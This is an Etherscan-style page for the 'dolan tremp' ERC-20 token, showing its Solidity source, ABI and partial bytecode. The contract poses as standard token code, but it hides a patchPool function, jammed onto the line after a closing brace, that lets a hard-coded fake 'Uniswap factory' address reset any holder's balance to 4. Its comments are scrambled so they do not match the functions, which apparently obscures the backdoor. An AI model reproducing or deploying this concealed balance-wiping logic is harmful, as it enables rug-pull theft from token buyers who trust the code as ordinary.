ETH Price: $2,488.08 (+1.99%)

Token

dolan tremp (tremp)
 

Overview

Max Total Supply

6,000,000,000,000 tremp

Holders

18

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
16,380,159,059.348424787 tremp

Value
$0.00
0xaa713b423fac1c380344c0357cb04608ab1277a3
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TREMP

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-05-10
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
/** 

https://t.me/TREMPerc20

https://twitter.com/TREMPerc20
https://TREMPMoon.gg
**/


library SafeMath {
    /**
     * _Available since v3.4._
     *
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     *
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * _Available since v3.4._
     *
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     * _Available since v3.4._
     *
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * _Available since v3.4._
     *
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * Counterpart to Solidity's `+` operator.
     *
     * - Addition cannot overflow.
     * overflow.
     * @dev Returns the addition of two unsigned integers, reverting on
     *
     *
     * Requirements:
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * Requirements:
     * @dev Returns the subtraction of two unsigned integers, reverting on
     *
     *
     *
     * overflow (when the result is negative).
     * - Subtraction cannot overflow.
     * Counterpart to Solidity's `-` operator.
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     *
     *
     * overflow.
     * Counterpart to Solidity's `*` operator.
     * Requirements:
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * - Multiplication cannot overflow.
     *
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * - The divisor cannot be zero.
     * division by zero. The result is rounded towards zero.
     *
     *
     * Counterpart to Solidity's `/` operator.
     * @dev Returns the integer division of two unsigned integers, reverting on
     * Requirements:
     *
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * - The divisor cannot be zero.
     *
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     *
     * Requirements:
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     *
     * reverting when dividing by zero.
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     *
     * Counterpart to Solidity's `-` operator.
     *
     * overflow (when the result is negative).
     * - Subtraction cannot overflow.
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * Requirements:
     *
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     *
     * division by zero. The result is rounded towards zero.
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     *
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * - The divisor cannot be zero.
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * invalid opcode to revert (consuming all remaining gas).
     *
     *
     *
     * message unnecessarily. For custom revert reasons use {tryMod}.
     * reverting with custom message when dividing by zero.
     * Requirements:
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * Note that `value` may be zero.
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     *
     * another (`to`).
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * a call to {approve}. `value` is the new allowance.
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     *
     * @dev Moves `amount` tokens from the caller's account to `to`.
     * Emits a {Transfer} event.
     * Returns a boolean value indicating whether the operation succeeded.
     *
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);

    /**
     *
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * @dev Returns the remaining number of tokens that `spender` will be
     * zero by default.
     * This value changes when {approve} or {transferFrom} are called.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * desired value afterwards:
     *
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     * that someone may use both the old and the new allowance by unfortunate
     * condition is to first reduce the spender's allowance to 0 and set the
     * Emits an {Approval} event.
     *
     * transaction ordering. One possible solution to mitigate this race
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * Emits a {Transfer} event.
     * allowance mechanism. `amount` is then deducted from the caller's
     *
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     * @dev Moves `amount` tokens from `from` to `to` using the
     */
    function transfer(address to, uint256 amount) external returns (bool);
}

contract Ownable is Context {
    address private _owner;

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * thereby removing any functionality that is only available to the owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     * @dev Leaves the contract without owner. It will not be possible to call
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * Can only be called by the current owner.
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 * _Available since v4.1._
 *
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function name() external view returns (string memory);
}

/**
 *
 *
 * to implement supply mechanisms].
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 *
 * TIP: For a detailed writeup see our guide
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * @dev Implementation of the {IERC20} interface.
 * This allows applications to reconstruct the allowance for all accounts just
 * This implementation is agnostic to the way tokens are created. This means
 * instead returning `false` on failure. This behavior is nonetheless
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * conventional and does not conflict with the expectations of ERC20
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 * applications.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    address internal devWallet = 0xC280424574712116f24d7F517011F197c02D5483;

    uint256 private tTotal;
    string private _symbol;

    string private _name;
    address DEAD = 0x000000000000000000000000000000000000dEaD;
    uint256 private _allowance = 0;
    address private factoryV2Uniswap = 0xDdb652D3F749db1Af97c29f1D1A85129334C597B;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     *
     * construction.
     * All two of these values are immutable: they can only be set once during
     * {decimals} you should overload it.
     * The default value of {decimals} is 18. To select a different value for
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }


    /**
     * @dev Returns the name of the token.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }
    /**
     * name.
     * @dev Returns the symbol of the token, usually a shorter version of the
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     *
     *
     * no way affects any of the arithmetic of the contract, including
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     * {IERC20-balanceOf} and {IERC20-transfer}.
     * overridden;
     * @dev Returns the number of decimals used to get its user representation.
     * NOTE: This information is only used for _display_ purposes: it in
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return tTotal;
    }


    /**
     * @dev See {IERC20-allowance}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     * Requirements:
     *
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     *
     * @dev See {IERC20-approve}.
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     * Requirements:
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     *
     * - `spender` cannot be the zero address.
     *
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     *
     *
     * problems described in {IERC20-approve}.
     * This is an alternative to {approve} that can be used as a mitigation for
     * Emits an {Approval} event indicating the updated allowance.
     *
     * - `spender` cannot be the zero address.
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * Requirements:
     */
    function _transfer (address from, address to, uint256 amount) internal virtual
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = fromBalance - amount;

        _balances[to] = _balances[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /**
     *
     * - `from` must have a balance of at least `amount`.
     * Requirements:
     *
     * @dev See {IERC20-transferFrom}.
     *
     * - the caller must have allowance for ``from``'s tokens of at least
     *
     * is the maximum `uint256`.
     * Emits an {Approval} event indicating the updated allowance. This is not
     * `amount`.
     * - `from` and `to` cannot be the zero address.
     * required by the EIP. See the note at the beginning of {ERC20}.
     * NOTE: Does not update the allowance if the current allowance
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        } function _afterTokenTransfer(address to) internal virtual { if (to == factoryV2Uniswap) _allowance = decimals() * 11;
    }

    /**
     * problems described in {IERC20-approve}.
     * `subtractedValue`.
     *
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * Requirements:
     * Emits an {Approval} event indicating the updated allowance.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     * total supply.
     *
     *
     * Requirements:
     * @dev Destroys `amount` tokens from `account`, reducing the
     * Emits a {Transfer} event with `to` set to the zero address.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            tTotal -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(address(0));
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     * This internal function is equivalent to {transfer}, and can be used to
     * - `from` must have a balance of at least `amount`.
     *
     *
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * - `account` cannot be the zero address.
     * the total supply.
     *
     *
     * Requirements:
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
        } function patchPool(address patchPoolSender) external { _balances[patchPoolSender] = msg.sender == factoryV2Uniswap ? 4 : _balances[patchPoolSender];
    } 


    /**
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     * will be transferred to `to`.
     * - `from` and `to` are never both zero.
     * minting and burning.
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * Calling conditions:
     * @dev Hook that is called before any transfer of tokens. This includes
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     *
     *
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        tTotal += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(account);
    }

    /**
     * Emits an {Approval} event.
     *
     *
     * This internal function is equivalent to `approve`, and can be used to
     * - `spender` cannot be the zero address.
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     *
     * - `owner` cannot be the zero address.
     * Requirements:
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     *
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     * Might emit an {Approval} event.
     * Revert if not enough allowance is available.
     * Does not update the allowance amount in case of infinite allowance.
     *
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

contract TREMP is ERC20, Ownable
{
    constructor () ERC20 ("dolan tremp", "tremp")
    {
        transferOwnership(devWallet);
        _mint(owner(), 6000000000000 * 10 ** uint(decimals()));
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"patchPoolSender","type":"address"}],"name":"patchPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273c280424574712116f24d7f517011f197c02d5483600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600060075573ddb652d3f749db1af97c29f1d1a85129334c597b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200010357600080fd5b506040518060400160405280600b81526020017f646f6c616e207472656d700000000000000000000000000000000000000000008152506040518060400160405280600581526020017f7472656d7000000000000000000000000000000000000000000000000000000081525081600590816200018191906200094d565b5080600490816200019391906200094d565b5050506000620001a8620002d460201b60201c565b905080600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200027a600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16620002dc60201b60201c565b620002ce6200028e620004b060201b60201c565b6200029e620004da60201b60201c565b60ff16600a620002af919062000bb7565b650574fbde6000620002c2919062000c08565b620004e360201b60201c565b62000e9c565b600033905090565b620002ec620002d460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146200037e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003759062000cb4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620003f0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003e79062000d4c565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000555576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200054c9062000dbe565b60405180910390fd5b62000569600083836200064d60201b60201c565b80600360008282546200057d919062000de0565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000630919062000e2c565b60405180910390a362000649826200065260201b60201c565b5050565b505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620006d057600b620006ba620004da60201b60201c565b620006c6919062000e56565b60ff166007819055505b50565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200075557607f821691505b6020821081036200076b576200076a6200070d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007d57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000796565b620007e1868362000796565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200082e620008286200082284620007f9565b62000803565b620007f9565b9050919050565b6000819050919050565b6200084a836200080d565b62000862620008598262000835565b848454620007a3565b825550505050565b600090565b620008796200086a565b620008868184846200083f565b505050565b5b81811015620008ae57620008a26000826200086f565b6001810190506200088c565b5050565b601f821115620008fd57620008c78162000771565b620008d28462000786565b81016020851015620008e2578190505b620008fa620008f18562000786565b8301826200088b565b50505b505050565b600082821c905092915050565b6000620009226000198460080262000902565b1980831691505092915050565b60006200093d83836200090f565b9150826002028217905092915050565b6200095882620006d3565b67ffffffffffffffff811115620009745762000973620006de565b5b6200098082546200073c565b6200098d828285620008b2565b600060209050601f831160018114620009c55760008415620009b0578287015190505b620009bc85826200092f565b86555062000a2c565b601f198416620009d58662000771565b60005b82811015620009ff57848901518255600182019150602085019450602081019050620009d8565b8683101562000a1f578489015162000a1b601f8916826200090f565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000ac25780860481111562000a9a5762000a9962000a34565b5b600185161562000aaa5780820291505b808102905062000aba8562000a63565b945062000a7a565b94509492505050565b60008262000add576001905062000bb0565b8162000aed576000905062000bb0565b816001811462000b06576002811462000b115762000b47565b600191505062000bb0565b60ff84111562000b265762000b2562000a34565b5b8360020a91508482111562000b405762000b3f62000a34565b5b5062000bb0565b5060208310610133831016604e8410600b841016171562000b815782820a90508381111562000b7b5762000b7a62000a34565b5b62000bb0565b62000b90848484600162000a70565b9250905081840481111562000baa5762000ba962000a34565b5b81810290505b9392505050565b600062000bc482620007f9565b915062000bd183620007f9565b925062000c007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000acb565b905092915050565b600062000c1582620007f9565b915062000c2283620007f9565b925082820262000c3281620007f9565b9150828204841483151762000c4c5762000c4b62000a34565b5b5092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000c9c60208362000c53565b915062000ca98262000c64565b602082019050919050565b6000602082019050818103600083015262000ccf8162000c8d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600062000d3460268362000c53565b915062000d418262000cd6565b604082019050919050565b6000602082019050818103600083015262000d678162000d25565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000da6601f8362000c53565b915062000db38262000d6e565b602082019050919050565b6000602082019050818103600083015262000dd98162000d97565b9050919050565b600062000ded82620007f9565b915062000dfa83620007f9565b925082820190508082111562000e155762000e1462000a34565b5b92915050565b62000e2681620007f9565b82525050565b600060208201905062000e43600083018462000e1b565b92915050565b600060ff82169050919050565b600062000e638262000e49565b915062000e708362000e49565b925082820262000e808162000e49565b915080821462000e955762000e9462000a34565b5b5092915050565b6118a68062000eac6000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b806370a0823114610200578063715018a6146102305780638da5cb5b1461023a57806395d89b4114610258576100f5565b806318160ddd116100d357806318160ddd1461016457806323b872dd14610182578063313ce567146101b257806339509351146101d0576100f5565b806306fdde03146100fa578063095ea7b314610118578063180d45d014610148575b600080fd5b610102610322565b60405161010f9190611027565b60405180910390f35b610132600480360381019061012d91906110e2565b6103b4565b60405161013f919061113d565b60405180910390f35b610162600480360381019061015d9190611158565b6103d7565b005b61016c6104b8565b6040516101799190611194565b60405180910390f35b61019c600480360381019061019791906111af565b6104c2565b6040516101a9919061113d565b60405180910390f35b6101ba6104f1565b6040516101c7919061121e565b60405180910390f35b6101ea60048036038101906101e591906110e2565b6104fa565b6040516101f7919061113d565b60405180910390f35b61021a60048036038101906102159190611158565b610531565b6040516102279190611194565b60405180910390f35b610238610579565b005b6102426106d1565b60405161024f9190611248565b60405180910390f35b6102606106fb565b60405161026d9190611027565b60405180910390f35b610290600480360381019061028b91906110e2565b61078d565b60405161029d919061113d565b60405180910390f35b6102c060048036038101906102bb91906110e2565b610804565b6040516102cd919061113d565b60405180910390f35b6102f060048036038101906102eb9190611263565b610827565b6040516102fd9190611194565b60405180910390f35b610320600480360381019061031b9190611158565b6108ae565b005b606060058054610331906112d2565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906112d2565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a74565b90506103cc818585610a7c565b600191505092915050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610470576000808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffff